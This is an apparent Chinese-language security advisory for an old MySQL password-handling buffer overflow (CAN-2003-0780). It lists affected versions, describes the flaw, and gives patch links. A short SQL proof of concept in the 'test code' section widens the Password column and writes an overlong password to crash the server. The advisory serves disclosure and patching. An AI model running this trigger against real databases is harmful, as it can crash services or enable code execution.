|
MySQL密码处理远程缓冲区溢出漏洞
发布时间:2003-09-10
更新时间:2003-09-19
严重程度:中
威胁程度:权限提升
错误类型:环境错误
利用方式:服务器模式
BUGTRAQ ID:8590
CVE(CAN) ID:CAN-2003-0780
受影响系统
Conectiva Linux 7.0
Conectiva Linux 8.0
Conectiva Linux 9.0
MySQL AB MySQL 3.23 .x
MySQL AB MySQL 3.23.2
MySQL AB MySQL 3.23.3
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 5.0
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.5
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.8
MySQL AB MySQL 3.23.9
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.22
+ RedHat Linux 7.0
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0 sparc
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.26
+ RedHat Linux 7.1
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 ia64
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.28 gamma
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.31
+ MandrakeSoft Linux Mandrake 7.2
+ MandrakeSoft Single Network Firewall 7.2
MySQL AB MySQL 3.23.32
+ Wirex Immunix OS 7+
MySQL AB MySQL 3.23.33
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 x86
MySQL AB MySQL 3.23.34
- Debian Linux 2.2
- Debian Linux 2.2 68k
- Debian Linux 2.2 alpha
- Debian Linux 2.2 arm
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 sparc
- FreeBSD FreeBSD 3.5.1
- FreeBSD FreeBSD 4.2
- HP HP-UX 11.0
- HP HP-UX 11.11
- IBM AIX 4.3.2
- IBM AIX 4.3.3
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.2
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.8
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 sparc
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 7.1
- Sun Solaris 2.6
- Sun Solaris 2.6 _x86
- Sun Solaris 7.0
- Sun Solaris 7.0 _x86
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
MySQL AB MySQL 3.23.36
+ Conectiva Linux 6.0
+ Conectiva Linux 7.0
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
+ RedHat Linux 7.1
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 ia64
MySQL AB MySQL 3.23.37
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2 i386
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.39
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.41
+ MandrakeSoft Linux Mandrake 8.1
+ MandrakeSoft Linux Mandrake 8.1 ia64
+ RedHat Linux 7.2
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2 ia64
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.44
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 sparc
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.46
+ Conectiva Linux 8.0
+ OpenPKG OpenPKG 1.0
MySQL AB MySQL 3.23.47
+ MandrakeSoft Linux Mandrake 8.2
+ MandrakeSoft Linux Mandrake 8.2 ppc
MySQL AB MySQL 3.23.48
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0 i386
MySQL AB MySQL 3.23.49
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 sparc
+ RedHat Linux 7.3
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3 i686
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.52
+ MandrakeSoft Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0
+ RedHat Linux 8.0 i386
+ S.u.S.E. Linux 8.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.53 a
MySQL AB MySQL 3.23.53
+ OpenPKG OpenPKG Current
+ Sun Cobalt Qube 3
MySQL AB MySQL 3.23.54 a
+ OpenPKG OpenPKG Current
+ OpenPKG OpenPKG 1.2
+ RedHat Linux 9.0 i386
MySQL AB MySQL 3.23.54
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.55
+ OpenPKG OpenPKG Current
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.56
MySQL AB MySQL 4.0 .0
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.4
MySQL AB MySQL 4.0.5 a
MySQL AB MySQL 4.0.5
MySQL AB MySQL 4.0.6
MySQL AB MySQL 4.0.7 -gamma
MySQL AB MySQL 4.0.7
MySQL AB MySQL 4.0.8 -gamma
MySQL AB MySQL 4.0.8
MySQL AB MySQL 4.0.9 -gamma
MySQL AB MySQL 4.0.9
MySQL AB MySQL 4.0.10
MySQL AB MySQL 4.0.11 -gamma
MySQL AB MySQL 4.0.11
MySQL AB MySQL 4.0.12
MySQL AB MySQL 4.0.13
MySQL AB MySQL 4.0.14
+ OpenPKG OpenPKG Current
+ OpenPKG OpenPKG 1.3
+ Trustix Secure Linux 2.0
MySQL AB MySQL 4.1 .0-alpha
MySQL AB MySQL 4.1 .0-0
未影响系统
MySQL AB MySQL 4.0.15
+ OpenPKG OpenPKG Current
详细描述
MySQL server是一款数据库程序。
当处理超长的用户密码时缺少正确边界检查,可导致缓冲区溢出。如果密码超过16个字符可溢出缓冲区,破坏边界内存。攻击者拥有MYSQL管理员权限的用户可以利用这个漏洞以MySQL进程权限在系统上执行任意代码。
测试代码
> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;
[Connection lost]
解决方案
下载补丁程序:
http://downloads.securityfocus.c ... s/MySQL4.0.14.Patch
MySQL AB MySQL 3.23.36:
EnGarde Secure Linux Upgrade MySQL-3.23.56-1.0.23.i386.rpm
ftp://ftp.engardelinux.org/pub/e ... .56-1.0.23.i386.rpm
EnGarde Secure Linux Upgrade MySQL-client-3.23.56-1.0.23.i386.rpm
ftp://ftp.engardelinux.org/pub/e ... .56-1.0.23.i386.rpm
EnGarde Secure Linux Upgrade MySQL-shared-3.23.56-1.0.23.i386.rpm
ftp://ftp.engardelinux.org/pub/e ... .56-1.0.23.i386.rpm
EnGarde Secure Linux Upgrade MySQL-3.23.56-1.0.23.i686.rpm
ftp://ftp.engardelinux.org/pub/e ... .56-1.0.23.i686.rpm
EnGarde Secure Linux Upgrade MySQL-client-3.23.56-1.0.23.i686.rpm
ftp://ftp.engardelinux.org/pub/e ... .56-1.0.23.i686.rpm
EnGarde Secure Linux Upgrade MySQL-shared-3.23.56-1.0.23.i686.rpm
ftp://ftp.engardelinux.org/pub/e ... .56-1.0.23.i686.rpm
相关信息
Frank Denis <j@pureftpd.org>.
参考:http://www.securityfocus.com/advisories/5812
http://www.securityfocus.com/advisories/5860
http://www.securityfocus.com/archive/1/337012
http://www.securityfocus.com/advisories/5814
http://www.securityfocus.com/advisories/5864
http://www.securityfocus.com/advisories/5857
http://www.securityfocus.com/advisories/5808
相关主页:http://www.mysql.com/ |
|